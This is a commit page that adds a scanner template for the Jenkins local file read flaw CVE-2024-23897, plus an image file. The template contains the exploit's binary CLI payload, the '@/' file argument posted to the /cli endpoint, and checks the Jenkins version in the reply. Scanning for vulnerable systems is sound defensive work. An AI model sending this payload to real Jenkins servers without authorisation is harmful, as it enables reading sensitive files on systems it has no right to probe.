Add 2 files
Browse files- cve-2024-23897.yaml +34 -0
- images/PNG HTML.png +3 -0
cve-2024-23897.yaml
ADDED
|
@@ -0,0 +1,34 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
id: CVE-2024-23897
|
| 2 |
+
|
| 3 |
+
info:
|
| 4 |
+
name: Jenkins LFI Vulnerability CVE-2024-23897
|
| 5 |
+
author: katmaca
|
| 6 |
+
severity: high
|
| 7 |
+
description: This template serves as a crucial warning to all users if the CVE-2024-23897 local file vulnerability is detected within your system, it is imperative to take immediate action and patch your systems without delay. This vulnerability poses a significant risk to the security and integrity of your system, potentially allowing unauthorized access to sensitive files and data
|
| 8 |
+
reference:
|
| 9 |
+
- https://nvd.nist.gov/vuln/detail/CVE-2024-23897
|
| 10 |
+
classification:
|
| 11 |
+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
| 12 |
+
cvss-score: 7.5
|
| 13 |
+
cve-id: CVE-2024-23897
|
| 14 |
+
|
| 15 |
+
variables:
|
| 16 |
+
payload: "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03"
|
| 17 |
+
|
| 18 |
+
http:
|
| 19 |
+
- method: POST
|
| 20 |
+
path:
|
| 21 |
+
- "{{BaseURL}}/cli?remoting=false"
|
| 22 |
+
headers:
|
| 23 |
+
Side: upload
|
| 24 |
+
Session: b442300c-63e4-45c9-8011-6555a78331ee
|
| 25 |
+
Content-Type: application/octet-stream
|
| 26 |
+
body: "{{payload}}"
|
| 27 |
+
matchers:
|
| 28 |
+
- type: regex
|
| 29 |
+
regex:
|
| 30 |
+
- Jenkins ([0-2]+.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))
|
| 31 |
+
- type: regex
|
| 32 |
+
part: header
|
| 33 |
+
regex:
|
| 34 |
+
- X-Jenkins[:] ([0-2]+.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))
|
images/PNG HTML.png
ADDED
|
Git LFS Details
|